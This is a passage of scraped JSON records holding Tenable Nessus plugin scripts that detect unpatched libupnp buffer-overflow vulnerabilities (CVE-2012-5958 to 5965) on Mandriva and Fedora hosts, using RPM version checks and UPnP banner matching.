S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66110);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"MDVSA\", value:\"2013:098\");\n script_xref(name:\"MGASA\", value:\"2013-0037\");\n\n script_name(english:\"Mandriva Linux Security Advisory : libupnp (MDVSA-2013:098)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libupnp packages fix security vulnerabilities :\n\nThe Portable SDK for UPnP Devices libupnp library contains multiple\nbuffer overflow vulnerabilities. Devices that use libupnp may also\naccept UPnP queries over the WAN interface, therefore exposing the\nvulnerabilities to the internet (CVE-2012-5958, CVE-2012-5959,\nCVE-2012-5960, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963,\nCVE-2012-5964, CVE-2012-5965).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64ixml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64threadutil6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64upnp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64upnp6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64ixml2-1.6.15-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64threadutil6-1.6.15-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64upnp-devel-1.6.15-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64upnp6-1.6.15-2.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:08", "description": "linupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-02-13T00:00:00", "title": "Fedora 16 : libupnp-1.6.18-1.fc16 (2013-1713)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-13T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libupnp", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-1713.NASL", "href": "https://www.tenable.com/plugins/nessus/64597", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1713.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64597);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"FEDORA\", value:\"2013-1713\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 16 : libupnp-1.6.18-1.fc16 (2013-1713)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"linupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098665.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1868e4ea\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"libupnp-1.6.18-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T15:43:14", "description": "According to its banner, the version of Portable SDK for UPnP Devices\n(libupnp) running on the remote host is prior to 1.6.18. It is,\ntherefore, affected by multiple remote code execution\nvulnerabilities :\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the DeviceType URN. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted SSDP request, to execute arbitrary code.\n (CVE-2012-5958)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to two colons. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted SSDP request, to execute arbitrary\n code. (CVE-2012-5959)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to the '::upnp:rootdevice'\n string. An unauthenticated, remote attacker can exploit\n this, via a specially crafted SSDP request, to execute\n arbitrary code. (CVE-2012-5960)\n\n - Multiple stack-based buffer overflow conditions exist in\n the unique_service_name() function within file\n ssdp/ssdp_server.c due to improper validation of the\n UDN, DeviceType, and ServiceType fields when parsing\n Simple Service Discovery Protocol (SSDP) requests. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted SSDP request, to execute\n arbitrary code. (CVE-2012-5961, CVE-2012-5962,\n CVE-2012-5963, CVE-2012-5964, CVE-2012-5965)", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-02-01T00:00:00", "title": "Portable SDK for UPnP Devices (libupnp) < 1.6.18 Multiple Stack-based Buffer Overflows RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-01T00:00:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp", "cpe:/a:libupnp_project:libupnp"], "id": "LIBUPNP_1_6_18.NASL", "href": "https://www.tenable.com/plugins/nessus/64394", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64394);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/02\");\n\n script_cve_id(\n \"CVE-2012-5958\",\n \"CVE-2012-5959\",\n \"CVE-2012-5960\",\n \"CVE-2012-5961\",\n \"CVE-2012-5962\",\n \"CVE-2012-5963\",\n \"CVE-2012-5964\",\n \"CVE-2012-5965\"\n );\n script_bugtraq_id(57602);\n script_xref(name:\"CERT\", value:\"922681\");\n script_xref(name:\"EDB-ID\", value:\"24455\");\n\n script_name(english:\"Portable SDK for UPnP Devices (libupnp) < 1.6.18 Multiple Stack-based Buffer Overflows RCE\");\n script_summary(english:\"Checks the libupnp banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network service running on the remote host is affected by multiple\nremote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Portable SDK for UPnP Devices\n(libupnp) running on the remote host is prior to 1.6.18. It is,\ntherefore, affected by multiple remote code execution\nvulnerabilities :\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the DeviceType URN. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted SSDP request, to execute arbitrary code.\n (CVE-2012-5958)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to two colons. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted SSDP request, to execute arbitrary\n code. (CVE-2012-5959)\n\n - A stack-based buffer overflow condition exists in the\n unique_service_name() function within file\n ssdp/ssdp_server.c when handling Simple Service\n Discovery Protocol (SSDP) requests that is triggered\n while copying the UDN prior to the '::upnp:rootdevice'\n string. An unauthenticated, remote attacker can exploit\n this, via a specially crafted SSDP request, to execute\n arbitrary code. (CVE-2012-5960)\n\n - Multiple stack-based buffer overflow conditions exist in\n the unique_service_name() function within file\n ssdp/ssdp_server.c due to improper validation of the\n UDN, DeviceType, and ServiceType fields when parsing\n Simple Service Discovery Protocol (SSDP) requests. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted SSDP request, to execute\n arbitrary code. (CVE-2012-5961, CVE-2012-5962,\n CVE-2012-5963, CVE-2012-5964, CVE-2012-5965)\");\n # https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46d66d2f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.rapid7.com/?community\");\n # https://help.rapid7.com/?community\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d381943f\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8642ada6\");\n # https://cert-portal.siemens.com/productcert/pdf/ssa-963338.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a76191f3\");\n \n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to libupnp version 1.6.18 or later. If libupnp is used as a\nthird party library by a different application, contact the vendor of\nthat application for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-5958\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:libupnp_project:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"upnp_search.nasl\", \"http_version.nasl\");\n script_require_ports(\"upnp/server\", \"Services/www\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nglobal_var fix, vuln;\nfix = '1.6.18';\nvuln = FALSE;\n\n##\n# Checks if the given server banner is from a vulnerable\n# version of libupnp. If so, a reporting function is\n# called\n#\n# @param port port number of the service being tested\n# @param server server banner advertised on \"port\"\n# @param proto the protocol the port is accessible by (tcp or udp)\n##\nfunction _check_libupnp_version(port, server, proto)\n{\n local_var ver, report, banner;\n server = chomp(server);\n ver = pregmatch(string:server, pattern:' (Intel|Portable|WindRiver) SDK for UPnP devices */([0-9.]+)', icase:TRUE);\n\n # the latter two checks are there to account for one-offs where there is no version listed\n # in the server banner, but these specific versions are listed as vulnerable in R7's report\n if (\n (!isnull(ver) && ver_compare(ver:ver[2], fix:fix, strict:FALSE) < 0) ||\n server == 'PACKAGE_VERSION WIND version 2.8, UPnP/1.0, WindRiver SDK for UPnP devices/' ||\n server == 'Linux/2.6.22.19-40-sigma, UPnP/1.0, Portable SDK for UPnP devices/'\n )\n {\n vuln = TRUE;\n\n banner = preg_replace(string:server, pattern:'SERVER: *(.+)', replace:\"\\1\", icase:TRUE);\n report = '\\n Server banner : ' + banner;\n report += '\\n Source: ' + toupper(proto);\n if (!isnull(ver[2])) report += '\\n Installed version : ' + ver[2];\n report += '\\n Fixed version : ' + fix + '\\n';\n\n security_report_v4(port:port,\n proto:proto,\n severity:SECURITY_HOLE,\n extra:report);\n }\n}\n\n# check the server string retrieved via UDP 1900 by upnp_search.nasl\nservers = get_kb_list('upnp/server');\nforeach (server in servers) _check_libupnp_version(port:1900, server:server, proto:'udp');\n\n# check any server strings retrieved via HTTP and there are any UPnP ports open\nwww_ports = get_kb_list('Services/www');\nif (!isnull(servers))\n{\n foreach port (www_ports)\n {\n server = http_server_header(port:port);\n if (isnull(server)) continue;\n\n _check_libupnp_version(port:port, server:server, proto:'tcp');\n }\n}\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:41", "description": "Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "published": "2013-02-21T00:00:00", "title": "Fedora 18 : mediatomb-0.12.1-23.fc18 (2013-2377)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:mediatomb"], "id": "FEDORA_2013-2377.NASL", "href": "https://www.tenable.com/plugins/nessus/64736", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-2377.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64736);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_bugtraq_id(57602);\n script_xref(name:\"FEDORA\", value:\"2013-2377\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 18 : mediatomb-0.12.1-23.fc18 (2013-2377)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unbundle libupnp.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099022.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af59645a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediatomb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediatomb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"mediatomb-0.12.1-23.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediatomb\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:12", "description": "libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-02-13T00:00:00", "title": "Fedora 18 : libupnp-1.6.18-1.fc18 (2013-1765)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:libupnp"], "id": "FEDORA_2013-1765.NASL", "href": "https://www.tenable.com/plugins/nessus/64601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1765.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64601);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"FEDORA\", value:\"2013-1765\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 18 : libupnp-1.6.18-1.fc18 (2013-1765)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098664.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb32bb09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 